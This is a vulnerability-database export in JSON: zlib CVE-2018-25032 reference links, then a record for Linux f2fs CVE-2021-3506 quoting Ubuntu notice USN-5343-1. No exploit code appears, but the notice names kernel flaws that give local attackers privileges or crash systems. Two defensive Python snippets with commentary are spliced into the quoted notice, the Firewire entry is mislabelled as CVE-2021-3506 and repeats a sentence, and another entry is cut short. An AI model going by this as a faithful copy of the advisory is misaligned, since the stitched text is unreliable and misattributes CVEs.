{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167400/red-hat-security-advisory-2022-4896-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.6128"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.3977"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167391/red-hat-security-advisory-2022-4592-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.2924"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/170003/ubuntu-security-notice-usn-5739-1.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022072056"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167956/red-hat-security-advisory-2022-5840-01.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022060505"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.3146"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022062931"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167622/red-hat-security-advisory-2022-5392-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167088/red-hat-security-advisory-2022-1679-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.3020"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022053025"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167346/red-hat-security-advisory-2022-4863-01.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022032845"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.6333"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022050233"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022070507"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022051324"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.2411"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.4632"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166946/red-hat-security-advisory-2022-1681-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167461/red-hat-security-advisory-2022-4985-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167568/red-hat-security-advisory-2022-5152-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.3821"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1665"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1863"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.3228"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.2019"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.2778"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167224/red-hat-security-advisory-2022-4692-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/168042/red-hat-security-advisory-2022-5069-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167142/red-hat-security-advisory-2022-2216-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.2857"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166970/red-hat-security-advisory-2022-1715-01.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb20220720108"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022042114"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167260/red-hat-security-advisory-2022-2283-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167555/red-hat-security-advisory-2022-5132-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167591/red-hat-security-advisory-2022-5188-01.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022061722"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/168392/red-hat-security-advisory-2022-6526-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167486/ubuntu-security-notice-usn-5359-2.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022040603"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.2181"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167189/apple-security-advisory-2022-05-16-4.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166563/ubuntu-security-notice-usn-5359-1.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.3112"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.3236"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.3479"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.4568"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.4601"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-1271"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3634"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-4189"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3634"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3737"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3752"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-4157"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3744"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0235"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-13974"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-41617"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-45485"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3773"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-4002"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-29154"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-43976"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-0941"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-43389"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-27820"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-44733"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0536"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-21781"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-4037"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-29154"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-37159"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-4788"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3772"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-0404"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3669"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3764"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-20322"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-43056"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3612"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-41864"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-4197"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-0941"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3612"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-26401"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-27820"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3743"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1011"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13974"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20322"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-4083"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-45486"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0322"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-4788"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-26401"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0286"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0001"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-23806"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3759"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-21781"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0002"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-4203"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-42739"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-0404"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1677"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1677"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1271"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/787.html"
},
{
"trust": 0.1,
"url": "https://github.com/ziparchive/ziparchive"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-23-348-10"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3669"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1708"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html-single/install/index#installing"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html/release_notes/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3696"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-38185"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-28733"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0492"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21803"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-29526"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-28736"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3697"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-28734"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-25219"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-28737"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-25219"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3695"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-28735"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-24785"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:5392"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-29810"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html/release_notes/index"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21426"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21443"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21476"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21496"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:2272"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhba-2022:2270"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21496"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.8/updating/updating-cluster-cli.html"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21434"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21443"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21434"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21426"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21476"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/9/html/9.1_release_notes/index"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:8420"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:0943"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.7_release_notes/index"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:7813"
},
{
"trust": 0.1,
"url": "https://issues.jboss.org/):"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-23773"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.9/html/serverless/index"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.8/html/serverless/index"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.10/html/serverless/index"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-23806"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.6/html/serverless/index"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-23772"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3737"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-4189"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23773"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.7/html/serverless/index"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:4863"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23772"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhba-2022:2267"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.7/updating/updating-cluster-cli.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:2268"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-release-notes.html"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/latest/migration_toolkit_for_containers/installing-mtc.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-19131"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3807"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1154"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-35492"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26691"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:5483"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-19131"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23852"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-35492"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-418557"
},
{
"db": "VULMON",
"id": "CVE-2018-25032"
},
{
"db": "PACKETSTORM",
"id": "167622"
},
{
"db": "PACKETSTORM",
"id": "167271"
},
{
"db": "PACKETSTORM",
"id": "169897"
},
{
"db": "PACKETSTORM",
"id": "171159"
},
{
"db": "PACKETSTORM",
"id": "169782"
},
{
"db": "PACKETSTORM",
"id": "167346"
},
{
"db": "PACKETSTORM",
"id": "167265"
},
{
"db": "PACKETSTORM",
"id": "167679"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-2221"
},
{
"db": "NVD",
"id": "CVE-2018-25032"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-418557",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2018-25032",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "167622",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "167271",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "169897",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "171159",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "169782",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "167346",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "167265",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "167679",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-202203-2221",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2018-25032",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2022-03-25T00:00:00",
"db": "VULHUB",
"id": "VHN-418557",
"ident": null
},
{
"date": "2022-03-25T00:00:00",
"db": "VULMON",
"id": "CVE-2018-25032",
"ident": null
},
{
"date": "2022-06-29T20:27:02",
"db": "PACKETSTORM",
"id": "167622",
"ident": null
},
{
"date": "2022-05-26T16:32:44",
"db": "PACKETSTORM",
"id": "167271",
"ident": null
},
{
"date": "2022-11-16T16:09:49",
"db": "PACKETSTORM",
"id": "169897",
"ident": null
},
{
"date": "2023-02-28T16:53:38",
"db": "PACKETSTORM",
"id": "171159",
"ident": null
},
{
"date": "2022-11-08T13:50:54",
"db": "PACKETSTORM",
"id": "169782",
"ident": null
},
{
"date": "2022-06-01T17:29:48",
"db": "PACKETSTORM",
"id": "167346",
"ident": null
},
{
"date": "2022-05-26T16:03:57",
"db": "PACKETSTORM",
"id": "167265",
"ident": null
},
{
"date": "2022-07-01T15:04:32",
"db": "PACKETSTORM",
"id": "167679",
"ident": null
},
{
"date": "2022-03-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202203-2221",
"ident": null
},
{
"date": "2022-03-25T09:15:08.187000",
"db": "NVD",
"id": "CVE-2018-25032",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2023-02-11T00:00:00",
"db": "VULHUB",
"id": "VHN-418557",
"ident": null
},
{
"date": "2023-11-07T00:00:00",
"db": "VULMON",
"id": "CVE-2018-25032",
"ident": null
},
{
"date": "2023-06-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202203-2221",
"ident": null
},
{
"date": "2025-08-21T20:37:11.840000",
"db": "NVD",
"id": "CVE-2018-25032",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202203-2221"
}
],
"trust": 0.6
},
"title": {
"_id": null,
"data": "zlib Buffer error vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202203-2221"
}
],
"trust": 0.6
},
"type": {
"_id": null,
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202203-2221"
}
],
"trust": 0.6
}
}
VAR-202104-1670
Vulnerability from variot - Updated: 2026-03-09 20:30

An out-of-bounds (OOB) memory access flaw was found in fs/f2fs/node.c in the f2fs module in the Linux kernel in versions before 5.12.0-rc4. A bounds check failure allows a local attacker to gain access to out-of-bounds memory leading to a system crash or a leak of internal kernel information. The highest threat from this vulnerability is to system availability. An out-of-bounds read vulnerability exists in the Linux Kernel. Information may be disclosed and service operation may be interrupted (a DoS condition). The vulnerability stems from a boundary check failure.

==========================================================================
Ubuntu Security Notice USN-5343-1
March 22, 2022
linux, linux-aws, linux-kvm, linux-lts-xenial vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 16.04 ESM
- Ubuntu 14.04 ESM
Summary:
Several security issues were fixed in the Linux kernel.
Software Description:
- linux: Linux kernel
- linux-aws: Linux kernel for Amazon Web Services (AWS) systems
- linux-kvm: Linux kernel for cloud environments
- linux-lts-xenial: Linux hardware enablement kernel from Xenial for Trusty
Details:
Yiqi Sun and Kevin Wang discovered that the cgroups implementation in the Linux kernel did not properly restrict access to the cgroups v1 release_agent feature. A local attacker could use this to gain administrative privileges. (CVE-2022-0492)
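As a hedged aside, exposure to the cgroups v1 release_agent issue above can be approximated with a small check. This is an illustrative sketch only, not part of the advisory: the /sys/fs/cgroup/*/release_agent path is an assumption that varies by distribution, and cgroup v2 systems will simply report no matches.

```python
# Hypothetical exposure check for CVE-2022-0492: on cgroup v1 systems, the
# release_agent file must not be writable by unprivileged users. The
# /sys/fs/cgroup/*/release_agent layout is an assumption; other mount
# layouts (or cgroup v2) will yield no matches.
import glob
import os


def writable_release_agents(root="/sys/fs/cgroup"):
    """Return cgroup v1 release_agent files the current user can write."""
    pattern = os.path.join(root, "*", "release_agent")
    return [path for path in glob.glob(pattern) if os.access(path, os.W_OK)]


if __name__ == "__main__":
    hits = writable_release_agents()
    if hits:
        print("potentially exposed release_agent files:", hits)
    else:
        print("no writable cgroup v1 release_agent files found")
```

A writable release_agent alone does not prove exploitability; patched kernels restrict how the file can be abused, so treat any hit as a prompt to verify the kernel version.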
It was discovered that the aufs file system in the Linux kernel did not properly restrict mount namespaces, when mounted with the non-default allow_userns option set. A local attacker could use this to gain administrative privileges. (CVE-2016-2853)
It was discovered that the aufs file system in the Linux kernel did not properly maintain POSIX ACL xattr data, when mounted with the non-default allow_userns option. A local attacker could possibly use this to gain elevated privileges. (CVE-2016-2854)
It was discovered that the f2fs file system in the Linux kernel did not properly validate metadata in some situations. An attacker could use this to construct a malicious f2fs image that, when mounted and operated on, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-19449)
It was discovered that the XFS file system implementation in the Linux kernel did not properly validate meta data in some circumstances. An attacker could use this to construct a malicious XFS image that, when mounted, could cause a denial of service. (CVE-2020-12655)
Kiyin (尹亮) discovered that the NFC LLCP protocol implementation in the Linux kernel contained a reference counting error. A local attacker could use this to cause a denial of service (system crash). (CVE-2020-25670)
Kiyin (尹亮) discovered that the NFC LLCP protocol implementation in the Linux kernel did not properly deallocate memory in certain error situations. A local attacker could use this to cause a denial of service (memory exhaustion). (CVE-2020-25671, CVE-2020-25672)
Kiyin (尹亮) discovered that the NFC LLCP protocol implementation in the Linux kernel did not properly handle error conditions in some situations, leading to an infinite loop. A local attacker could use this to cause a denial of service. (CVE-2020-25673)
Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation incorrectly handled EAPOL frames from unauthenticated senders. A physically proximate attacker could inject malicious packets to cause a denial of service (system crash). (CVE-2020-26139)
Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation could reassemble mixed encrypted and plaintext fragments. A physically proximate attacker could possibly use this issue to inject packets or exfiltrate selected fragments. (CVE-2020-26147)
It was discovered that the BR/EDR pin-code pairing procedure in the Linux kernel was vulnerable to an impersonation attack. A physically proximate attacker could possibly use this to pair to a device without knowledge of the pin-code. An authenticated attacker could possibly use this to expose sensitive information. (CVE-2020-26558, CVE-2021-0129)
It was discovered that the FUSE user space file system implementation in the Linux kernel did not properly handle bad inodes in some situations. A local attacker could possibly use this to cause a denial of service. (CVE-2020-36322)
It was discovered that the Infiniband RDMA userspace connection manager implementation in the Linux kernel contained a race condition leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2020-36385)
It was discovered that the DRM subsystem in the Linux kernel contained double-free vulnerabilities. A privileged attacker could possibly use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-20292)
It was discovered that a race condition existed in the timer implementation in the Linux kernel. A privileged attacker could use this to cause a denial of service. (CVE-2021-20317)
Or Cohen and Nadav Markus discovered a use-after-free vulnerability in the nfc implementation in the Linux kernel. A privileged local attacker could use this issue to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-23134)
It was discovered that the Xen paravirtualization backend in the Linux kernel did not properly deallocate memory in some situations. A local attacker could use this to cause a denial of service (memory exhaustion). (CVE-2021-28688)
It was discovered that the RPA PCI Hotplug driver implementation in the Linux kernel did not properly handle device name writes via sysfs, leading to a buffer overflow. A privileged attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-28972)
It was discovered that a race condition existed in the netfilter subsystem of the Linux kernel when replacing tables. A local attacker could use this to cause a denial of service (system crash). (CVE-2021-29650)
It was discovered that a race condition in the kernel Bluetooth subsystem could lead to use-after-free of slab objects. An attacker could use this issue to possibly execute arbitrary code. (CVE-2021-32399)
It was discovered that the CIPSO implementation in the Linux kernel did not properly perform reference counting in some situations, leading to use- after-free vulnerabilities. An attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-33033)
It was discovered that a use-after-free existed in the Bluetooth HCI driver of the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-33034)
Asaf Modelevsky discovered that the Intel(R) Ethernet ixgbe driver for the Linux kernel did not properly validate large MTU requests from Virtual Function (VF) devices. A local attacker could possibly use this to cause a denial of service. (CVE-2021-33098)
Norbert Slusarek discovered that the CAN broadcast manager (bcm) protocol implementation in the Linux kernel did not properly initialize memory in some situations. (CVE-2021-34693)
马哲宇 discovered that the IEEE 1394 (Firewire) nosy packet sniffer driver in the Linux kernel did not properly perform reference counting in some situations, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. A local attacker could use this issue to cause a denial of service (system crash). (CVE-2021-3506)
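The bounds-check failure class behind CVE-2021-3506, described at the top of this record, can be sketched in a minimal form. This is not the actual fs/f2fs/node.c code, only the generic pattern of validating an index read from untrusted on-disk metadata before using it:

```python
# Illustrative sketch only (not the real f2fs kernel code): an out-of-bounds
# read of this class occurs when an index derived from untrusted on-disk
# metadata is used without a bounds check. The fix pattern validates first.

def lookup_entry(table, idx_from_disk):
    """Return table[idx_from_disk], rejecting out-of-range indices."""
    if not 0 <= idx_from_disk < len(table):
        # Reject instead of reading out of bounds (in C this read would
        # leak adjacent kernel memory or crash the system).
        return None
    return table[idx_from_disk]


node_table = [10, 20, 30, 40]
print(lookup_entry(node_table, 2))    # in range -> 30
print(lookup_entry(node_table, 100))  # rejected -> None
```

In the kernel fix, the check runs before the on-disk index is used to address an in-memory table, which is what turns a crafted filesystem image from a memory-disclosure primitive into a cleanly rejected error.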
It was discovered that the bluetooth subsystem in the Linux kernel did not properly handle HCI device initialization failure, leading to a double-free vulnerability. An attacker could use this to cause a denial of service or possibly execute arbitrary code. (CVE-2021-3564)
It was discovered that the bluetooth subsystem in the Linux kernel did not properly handle HCI device detach events, leading to a use-after-free vulnerability. An attacker could use this to cause a denial of service or possibly execute arbitrary code. (CVE-2021-3573)
Murray McAllister discovered that the joystick device interface in the Linux kernel did not properly validate data passed via an ioctl(). A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code on systems with a joystick device registered. (CVE-2021-3612)
It was discovered that the tracing subsystem in the Linux kernel did not properly keep track of per-cpu ring buffer state. A privileged attacker could use this to cause a denial of service. (CVE-2021-3679)
It was discovered that the Virtio console implementation in the Linux kernel did not properly validate input lengths in some situations. A local attacker could possibly use this to cause a denial of service (system crash). (CVE-2021-38160)
It was discovered that the KVM hypervisor implementation in the Linux kernel did not properly compute the access permissions for shadow pages in some situations. A local attacker could use this to cause a denial of service. (CVE-2021-38198)
